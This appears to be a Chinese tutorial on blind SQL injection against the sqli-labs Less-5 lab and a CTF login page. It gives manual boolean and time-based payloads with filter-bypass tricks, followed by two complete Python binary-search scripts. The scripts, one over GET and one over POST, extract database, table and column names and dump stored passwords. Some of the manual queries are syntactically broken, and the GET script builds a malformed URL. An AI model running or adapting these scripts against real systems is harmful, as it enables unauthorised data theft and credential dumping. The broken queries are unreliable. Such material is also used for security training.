SQL盲注二分法注入腳本

sql盲注二分法注入腳本

此腳本可以用來檢測sql靶場第五關

http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1

手工注入

猜測數據庫
?id=1' and length(database())=8-- -
id=1' and left(database(),1)>'a' -- - 1
id=1' and left(database(),1)>'z' -- - 0
在a-z之間
id=1' and left(database(),1)>'r' -- -1
id=1' and left(database(),1)>'s' -- -0
id=1' and left(database(),2)>'sa'-- -

猜測表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是從0開始第幾個表，b是爲第幾個字符，n是ASCII所對應的十進制數
第一個表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101

第二個表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判斷user表

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

盲注
時間盲注
?id=1' and sleep(5)-- -
?id=1' and if(length(database())>=8,sleep(5),1)-- -

盲注
1'^(ascii(substr((select database()),%d,1))<%d)^1#
括號 繞 空格
1'^(ascii(substr((select(database())),1,1))<1)^1#
逗號被過濾
1'^(ascii(substr((select(database()))from(1)for(1)))<1)^1#
for被過濾
1'^(ascii(substr((select(database()))from(1)))<1)^1#
MySQL|SUBSTR() 函數用法
https://zhuanlan.zhihu.com/p/110142732
布爾注入 改後面的數字
1'^(ascii(substr((select(database()))from(1)))<1)^1#
97 98 99 100
異或 ^ 繞 過 =
1^1=0 1^0=1 0^0=0
每個字符的ascii碼判斷，是否不等於給定的數字，會得到一個布爾值(0或1)再與結尾的0進行運算。

重點：構造payload：

"1'^(ascii(substr((select(database()))from(%d)))<%d)^1#"

"1'^(ascii(substr((select(database())),%d,1))<%d)^1#" 

"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -"

"?id=1'^(ascii(mid((select(database())),%d,1))<%d)^1-- -"

SQL盲注get二分法布爾注入

#-*-coding:utf-8-*-
import requests
import time

#host = "http://web.jarvisoj.com:32787/login.php"
host = "http://127.0.0.1/sqlilabs/Less-5/?id=1"

def getDatabase():  #獲取數據庫名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)


def getTable(): #獲取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)

def getColumn(): #獲取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1" % (i,mid)
         #   res = requests.get(url)
            url = host + "id=1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)

def dumpTable():#脫褲
    global host
    ans=''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
         #   url = host + "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i,mid)
         #  res = requests.get(url)
            url = host + "id=1'^(ascii(substr((select(group_concat(password))from(users)),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)
        
getDatabase()
getTable()
getColumn()
dumpTable()

sql盲注post二分法布爾注入

#-*-coding:utf-8-*-
import requests
import time

host = "http://web.jarvisoj.com:32787/login.php"
#host = "http://127.0.0.1/sqlilabs/Less-5/?id=1"

def getDatabase():  #獲取數據庫名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用戶名錯誤" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)
        
def getTable(): #獲取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
           # url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用戶名錯誤" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)
        
def getColumn(): #獲取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))<%d)^1" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用戶名錯誤" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)
        
def dumpTable():#脫褲
    global host
    ans=''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用戶名錯誤" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)
        
getDatabase()
getTable()
getColumn()
dumpTable()